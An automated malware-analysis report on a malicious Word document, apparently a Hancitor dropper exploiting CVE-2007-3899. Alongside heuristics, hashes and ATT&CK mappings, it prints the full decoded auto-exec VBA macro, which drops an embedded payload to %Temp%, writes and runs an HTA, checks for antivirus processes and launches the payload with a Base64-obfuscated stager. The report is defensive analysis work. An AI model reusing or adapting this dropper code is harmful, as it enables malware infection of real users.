Verdict: MALICIOUS (Risk Score: 838)

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
- T1140 Deobfuscate or Obfuscate Malicious Code
- T1027 Obfuscated Files or Information
The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to execute a Document_Open VBA macro. This macro uses WScript.Shell and WMI Win32_Process to launch a Base64-decoded command stager, which appears to be 'cmd.exe /c ping localhost -n 100 &&'. The macro also attempts to save the document as an XML document and quit the application, likely as cleanup. An embedded PE executable and an Ole10Native package are also present, suggesting dropper functionality.
Heuristics (20)

- CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical, CVE likely, CVE_2007_3899]: Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- Office EPRINT stream contains EMF object [high, OLE_EPRINT_EMF_OBJECT]: OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
- ClamAV: Doc.Dropper.Hancitor-6774061-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0
- XOR-encoded strings (key 0x63) [critical, SC_XOR_ENCODED]: Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x63: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
Disassembly

x86 disassembly · validity: uncertain (0.484), no internal branches to corroborate control flow.
- Embedded PE executable [critical, OLE_EMBEDDED_EXE]: MZ/PE header found inside document, possible embedded executable.
- Ole10Native package drops an auto-executable payload [critical, OFFICE_PACKAGE_RISKY_FILE]: OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use: it is a malware-delivery dropper.
- VBA macros detected [medium, OLE_VBA_MACROS, 9 related findings]: Document contains VBA macro code.
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched line in script: `Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide`
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]. Matched line in script: `Set wsh = VBA.CreateObject("WScript.Shell")`
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script: `Set vcxvxczcv = GetObject("wi" & "nmgmts:")`
- VBA Base64-decoded Shell command stager [critical, OLE_VBA_BASE64_SHELL_COMMAND_STAGER]: VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching. Matched line in script: `Set vcxvxczcv = GetObject("wi" & "nmgmts:")`
- CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script: `Set wsh = VBA.CreateObject("WScript.Shell")`
- GetObject call [high, OLE_VBA_GETOBJ]. Matched line in script: `Set vcxvxczcv = GetObject("wi" & "nmgmts:")`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]. Matched line in script: `Private Sub Document_Open()`
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched line in script: `Open Environ("Temp") & "\1.hta" For Output As #1`
- Reference to Windows Script Host [high, SC_STR_WSCRIPT].
- Suspicious extracted artifact [high, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Reference to VirtualProtect API [medium, SC_STR_VIRTUALPROTECT].
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (4)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6039 bytes | 381ed55715cd80b983072b52ba54df581b64935b3dd2e02302cdfe4811ba184f |

Detection for macros.bas:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: runs the staging routines, waits ~3 s, then re-saves
' the document as XML and quits Word (see Module1.killo).
Private Sub Document_Open()
On Error Resume Next
Call kfs
Call sdfsdf
Set d = New DataObject
d.SetText " "
d.PutInClipboard
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveLeft Unit:=wdCharacter, Count:=13
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
Call Module1.killo
End Sub
Private Sub Document_Close()
Call closee
End Sub
' Base64 decoder built on MSXML's bin.base64 node type; this identical
' function is duplicated in Module2 and Module4 below.
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub
Attribute VB_Name = "Module2"
' Enumerates running processes via WMI (Win32_Process); the launch path
' chosen depends on which process names are present.
Sub closee()
Dim kjfaa
kjfaa = "bd" & "agent.exe"
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In yrtfdsad
Set wsh = VBA.CreateObject("WScript.Shell")
Dim pipec As Boolean: pipec = True
If x.Name = kjfaa Then
Dim kk
' Base64 blobs decode to an HTA that is written to %Temp%\1.hta and run
kk = StrConv(DecodeBase64("IFd" & "JTkRPV1NUQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode)
Open Environ("Temp") & "\1.hta" For Output As #1
Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
Print #1, kk
Close #1
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
End If
If x.Name = "PSUAMain.exe" Then
' "Y21k..." decodes to the stager "cmd.exe /c  ping localhost -n 100 && "; "VGVtcA==" decodes to "Temp"
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
Exit Sub
End If
If x.Name = "n360.exe" Then
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
Exit Sub
End If
Next
' Default path: same stager followed by %Temp%\6.pif ("XDYucGlm" decodes to "\6.pif")
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveRight Unit:=wdCharacter, Count:=24
Selection.TypeBackspace
Selection.Copy
End Sub
Attribute VB_Name = "Module4"
' Copies the dropped Ole10Native payload 5C.pif in %Temp% to 6.exe (and, via fadf, to 6.pif)
Sub sdfsdf()
Dim kk, lll, jgf, tyretw, gdfsfsa
gdfsfsa = "6"
jgf = "x" & "e"
tyretw = jgf & "p" & "i" & "f"
kk = ".p" & "if"
lll = "6" & ".e"
ChDir Environ("Te" & "mp")
Selection.TypeBackspace
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf
Call fadf
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Sub fadf()
kk = ".p" & "if"
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif"
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{03597D0D-30AB-4D75-A9F6-EE18B61C8BF3}{A9048FBB-A586-4F13-AAE7-1E7F621C35B3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3C891EA0-7856-4307-ADB2-3551DDC31345}{2D23EF38-5B2A-4D92-A550-6B64DF9CDBD6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
Remaining artifacts:

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_office_00018266.exe | embedded-pe | Office MZ+PE at offset 0x18266 | 129434 bytes | bb04da3a5a5fe6c1a325a1f108fc6388566b6d460b70c8620a38d88bf0fd8aea |
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1599569394/Ole10Native | 82196 bytes | 607d0026727bf484073c93caf0e7528374a294890394b147fc5d7616be42108e |
| ole10native_00_5C.pif | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1599569394/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file= | 81920 bytes | 490f6ee013a56c01dc57fa2e9f5bc7634d5a0800f07c3a820f8eac92efcbacef |

Detection for embedded_office_00018266.exe:
- ClamAV: No threats found
- Obfuscation or payload: likely. Static shellcode analysis recovered command string(s): WScript.Shell. Carved macro source contains an auto-exec entry point and execution/download terms.